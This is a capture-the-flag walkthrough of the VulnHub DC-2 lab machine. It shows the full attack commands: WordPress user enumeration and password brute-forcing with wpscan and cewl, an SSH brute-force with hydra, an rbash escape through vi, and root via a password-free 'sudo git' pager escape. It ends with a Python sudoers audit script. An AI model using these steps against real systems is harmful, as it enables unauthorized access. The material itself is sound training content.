DC-2 Target Machine Walkthrough

Target machine address

https://www.vulnhub.com/entry/dc-2,311/
DC-2.zip (Size: 847 MB)
Download: http://www.five86.com/downloads/DC-2.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-2.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-2.zip.torrent (Magnet)

Target machine description

Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

As with the original DC-1, it's designed with beginners in mind.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Just like with DC-1, there are five flags including the final flag.

And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.

In short, the only flag that really counts, is the final flag.

For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.

I haven't explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.

TECHNICAL INFORMATION
Please note that you will need to set the hosts file on your pentesting device to something like:

192.168.0.145 dc-2

Information gathering

Target machine address: 192.168.0.131
Attacker machine address: 192.168.0.102
From the hints in the description, DC-2 has five flags to collect,
and the hosts file must be set so that dc-2 resolves to the target address.
The command nmap -sP 192.168.0.0/24 confirms the target is at 192.168.0.131.
Then probe all ports: nmap -A -p- 192.168.0.131

Ports 80 and 7744 are open. Visiting the page on port 80, the hint says the hosts file must be set first: echo "192.168.0.131 dc-2" >> /etc/hosts
The site turns out to be WordPress, and flag1 is found under the Flag page.

Exploitation and privilege escalation

The flag mentions the cewl tool, which crawls a site's content to generate a wordlist: cewl http://dc-2 -w output.txt

Then enumerate usernames with wpscan for the brute-force: wpscan --url http://dc-2 -e u, which finds three users: admin, jerry and tom.

Use wpscan --url http://dc-2 --passwords ./output.txt to brute-force the passwords; this recovers the passwords of jerry and tom.

Next, log in at http://dc-2/wp-login.php; after logging in as jerry, flag2 is found under Pages.

The flag hints that if WordPress cannot be taken, another way must be found. (I also tried a vulnerability scan with wpscan, which needs a wpscan API token (register an account at https://wpscan.com/): wpscan --url http://dc-2 --api-token [YOUR APIToken]. The scan mostly found XSS-type vulnerabilities; the command-execution ones have awkward preconditions for exploitation.)

So start from the SSH port 7744 found earlier and brute-force SSH with hydra, using the accounts obtained earlier and the wordlist generated by cewl:
hydra -L ./dc2user.txt -P output.txt -s 7744 ssh://192.168.0.131 This finds the tom account.

After logging in as tom over SSH, flag3.txt is in tom's home directory, but running cat shows this is rbash (restricted bash). echo /home/tom/usr/bin/* shows the commands currently available to us: less, ls, scp, vi.

So first read flag3.txt with less.

It hints at tom, jerry and su; less /etc/passwd confirms the jerry account.

Next comes the rbash escape; the reference used is https://www.freebuf.com/articles/system/188989.html
We escape using vi's set shell method:
vi
:set shell=/bin/sh
:shell

Afterwards, set the PATH environment variable to get past the rbash restriction:
export PATH=$PATH:/bin:/usr/bin
echo $PATH

Then, following the hint, switch to the jerry user; flag4.txt is in that user's home directory.

Next cd to /tmp/ and run sudo -l: the git command can be run without a password, so git is the privilege escalation route.

Two methods:
1. sudo git help config
At the pager's command prompt, type !/bin/bash (or !'sh') to complete the escalation.
2. sudo git -p help
!/bin/bash

Finally, final-flag.txt is found in the root directory.

Reference: https://www.jianshu.com/p/c183392bc0e9?utm_campaign=haruki&utm_content=note&utm_medium=seo_notes&utm_source=recommendation
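The root route on DC-2 exists only because sudoers grants a password-free command that can spawn a shell through its pager. As an added example, not from the original post or the DC-2 author, here is a small audit that parses sudoers-style rules and flags exactly that pattern. The rule lines are constructed samples (the post only shows that sudo -l reported git as password-free for jerry, not the actual sudoers line), and the set of shell-capable programs is limited to the ones this walkthrough demonstrates.

```python
import os
import re

# Programs this walkthrough shows handing the caller a shell when run under
# sudo (git through its pager, vi and less through their shell escapes).
# Assumption: extend this set with whatever else your estate allows.
SHELL_CAPABLE = {"git", "vi", "vim", "less"}

# user host=(runas) [TAG:...] command[, command]   (aliases/includes ignored)
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def audit_sudoers(text):
    """Return (who, command, severity) for every rule that grants ALL or a
    shell-capable program: 'high' when no password is required, else 'medium'."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            if cmd == "ALL":                      # unrestricted sudo
                findings.append((m.group("who"), cmd, "high"))
                continue
            prog = os.path.basename(cmd.split()[0])
            if prog in SHELL_CAPABLE:
                severity = "high" if nopasswd else "medium"
                findings.append((m.group("who"), cmd, severity))
    return findings


# Constructed sample resembling what a DC-2-style box might contain.
SAMPLE_SUDOERS = """
Defaults env_reset
jerry ALL=(root) NOPASSWD: /usr/bin/git
tom   ALL=(ALL) /usr/bin/less, /usr/bin/apt-get
%sudo ALL=(ALL:ALL) ALL
"""

if __name__ == "__main__":
    for who, cmd, sev in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{sev:6} {who:8} {cmd}")
```

The fix on a real host is to remove the NOPASSWD grant for pager-backed or editor-like programs rather than to trust their environment settings.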

posted @ 2021-05-03 15:05  shadow-ink